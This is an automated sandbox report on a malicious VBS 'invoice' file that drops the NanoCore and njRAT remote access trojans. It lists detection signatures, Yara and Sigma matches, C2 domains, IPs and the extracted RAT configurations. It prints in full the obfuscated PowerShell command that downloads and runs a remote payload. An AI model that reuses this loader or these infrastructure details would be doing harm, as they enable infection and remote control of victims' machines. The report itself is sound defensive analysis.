
Windows Analysis Report 3G1J49A6V_Invoice.vbs

Overview

General Information

Sample Name: 3G1J49A6V_Invoice.vbs
Analysis ID: 458883
MD5: 2da417ae523148f7d65220a2c44d1a0a
SHA1: 7173fc941d4c051cf4bf5b1eac46aa33f2e6b798
SHA256: c3ddf55e53888193522a7b619370b746cb0a79502c5157a98754a9009f644a11
Tags: vbs

Detection

Nanocore Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Nanocore RAT
Yara detected Njrat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Suspicious PowerShell Command Line
Uses dynamic DNS services
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6628 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6756 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "401b59fa-a7f2-4468-a03b-04e3bc48", "Group": "NEW JAN", "Domain1": "newjan.duckdns.org", "Domain2": "newjan.duckdns.org", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Threatname: Njrat

{"Install Dir": "Windows", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HacKed", "Version": "v4.0", "Network Seprator": "|-F-|", "Host": "https://gro.sndkcud.armognad"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x51f2:$s1: POWERsHELL
00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0x55cff:$a: NanoCore
    • 0x55de9:$a: NanoCore
    • 0x56c60:$a: NanoCore
    • 0x5fe0a:$a: NanoCore
    • 0x5fe6b:$a: NanoCore
    • 0x5feae:$a: NanoCore
    • 0x5feee:$a: NanoCore
    • 0x6012a:$a: NanoCore
    • 0x601ca:$a: NanoCore
    • 0x609a2:$a: NanoCore
    • 0x60f95:$a: NanoCore
    • 0x610e6:$a: NanoCore
    • 0x61f40:$a: NanoCore
    • 0x621a7:$a: NanoCore
    • 0x621bc:$a: NanoCore
    • 0x621db:$a: NanoCore
    • 0x6b0de:$a: NanoCore
    • 0x6b107:$a: NanoCore
    • 0x76e80:$a: NanoCore
    • 0x76ea9:$a: NanoCore
    • 0x9bd6c:$a: NanoCore
00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
    • 0x15a0:$s1: POWERsHELL
00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
(11 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
      • 0x1a53c:$x1: NanoCore.ClientPluginHost
      • 0x2997c:$x1: NanoCore.ClientPluginHost
      • 0x1a556:$x2: IClientNetworkHost
      • 0x299b9:$x2: IClientNetworkHost
20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
      • 0x1a53c:$x2: NanoCore.ClientPluginHost
      • 0x2997c:$x2: NanoCore.ClientPluginHost
      • 0x1d879:$s4: PipeCreated
      • 0x2cdcf:$s4: PipeCreated
      • 0x1a529:$s5: IClientLoggingHost
      • 0x299a6:$s5: IClientLoggingHost
20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0xe9c8:$x1: NanoCore.ClientPluginHost
      • 0x1a76a:$x1: NanoCore.ClientPluginHost
      • 0x3f66e:$x1: NanoCore.ClientPluginHost
      • 0x4eaae:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      • 0xe9e2:$x2: IClientNetworkHost
      • 0x1a784:$x2: IClientNetworkHost
      • 0x3f688:$x2: IClientNetworkHost
      • 0x4eaeb:$x2: IClientNetworkHost
20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0xe9c8:$x2: NanoCore.ClientPluginHost
      • 0x1a76a:$x2: NanoCore.ClientPluginHost
      • 0x3f66e:$x2: NanoCore.ClientPluginHost
      • 0x4eaae:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0xf9fd:$s4: PipeCreated
      • 0x1c515:$s4: PipeCreated
      • 0x429ab:$s4: PipeCreated
      • 0x51f01:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      • 0xe9b5:$s5: IClientLoggingHost
      • 0x1a757:$s5: IClientLoggingHost
      • 0x3f65b:$s5: IClientLoggingHost
      • 0x4ead8:$s5: IClientLoggingHost
20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
      • 0x36cb:$a: NanoCore
      • 0x372c:$a: NanoCore
      • 0x376f:$a: NanoCore
      • 0x37af:$a: NanoCore
      • 0x39eb:$a: NanoCore
      • 0x3a8b:$a: NanoCore
      • 0x4263:$a: NanoCore
      • 0x4856:$a: NanoCore
      • 0x49a7:$a: NanoCore
      • 0x5801:$a: NanoCore
      • 0x5a68:$a: NanoCore
      • 0x5a7d:$a: NanoCore
      • 0x5a9c:$a: NanoCore
      • 0xe99f:$a: NanoCore
      • 0xe9c8:$a: NanoCore
      • 0x1a741:$a: NanoCore
      • 0x1a76a:$a: NanoCore
      • 0x3f62d:$a: NanoCore
      • 0x3f645:$a: NanoCore
      • 0x3f66e:$a: NanoCore
      • 0x4ea71:$a: NanoCore
(69 further unpacked PE entries not shown)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

Sigma detected: Suspicious PowerShell Command Line
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6756
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6756

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      AV Detection:

Found malware configuration
Source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "401b59fa-a7f2-4468-a03b-04e3bc48", "Group": "NEW JAN", "Domain1": "newjan.duckdns.org", "Domain2": "newjan.duckdns.org", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 22.2.aspnet_compiler.exe.400000.0.unpack, Malware Configuration Extractor: Njrat {"Install Dir": "Windows", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HacKed", "Version": "v4.0", "Network Seprator": "|-F-|", "Host": "https://gro.sndkcud.armognad"}
Yara detected Nanocore RAT
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
Yara detected Njrat
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR
Source: 22.2.aspnet_compiler.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen7
Source: 20.2.aspnet_compiler.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, Avira: Label: TR/NanoCore.fadte
Source: unknown, HTTPS traffic detected: 207.241.227.125:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 207.241.228.148:443 -> 192.168.2.4:49756 version: TLS 1.0
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb, source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt_{&, source: powershell.exe, 00000003.00000003.971380287.000001EA40435000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb, source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb, source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb, source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb, source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb, source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates

      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49776 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49780 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49781 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49782 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49783 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49784 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49785 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49786 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49787 -> 185.244.30.23:6700
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49789 -> 185.244.30.23:6700
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: newjan.duckdns.org
Source: Malware configuration extractor, URLs: https://gro.sndkcud.armognad
Uses dynamic DNS services
Source: unknown, DNS query: name: dangomra.duckdns.org
Source: unknown, DNS query: name: newjan.duckdns.org
Source: global traffic, TCP traffic: 192.168.2.4:49776 -> 185.244.30.23:6700
Source: Joe Sandbox View, IP Address: 207.241.227.125 207.241.227.125
Source: Joe Sandbox View, IP Address: 207.241.228.148 207.241.228.148
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown, HTTPS traffic detected: 207.241.227.125:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 207.241.228.148:443 -> 192.168.2.4:49756 version: TLS 1.0
Source: unknown, DNS traffic detected: queries for: ia601405.us.archive.org
Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmp, String found in binary or memory: http://certificates.godaddy.
Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmp, String found in binary or memory: http://certificates.godaddy.repo
Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp, String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp, String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, String found in binary or memory: http://google.com
Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.godaddy.com/05
Source: aspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmp, String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000003.00000003.669481789.000001EA294EC000.00000004.00000001.sdmp, String found in binary or memory: https://go.micro
Source: aspnet_compiler.exe, 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmp, String found in binary or memory: https://gro.sndkcud.armognad
Source: PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt.3.dr, String found in binary or memory: https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt
Source: Run.vbs.3.dr, String found in binary or memory: https://ia801408.us.archive.org/20/items/server_202108/Server.txt
Source: unknown, Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown, Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49756
Source: aspnet_compiler.exe, 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, Binary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
Yara detected Njrat
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
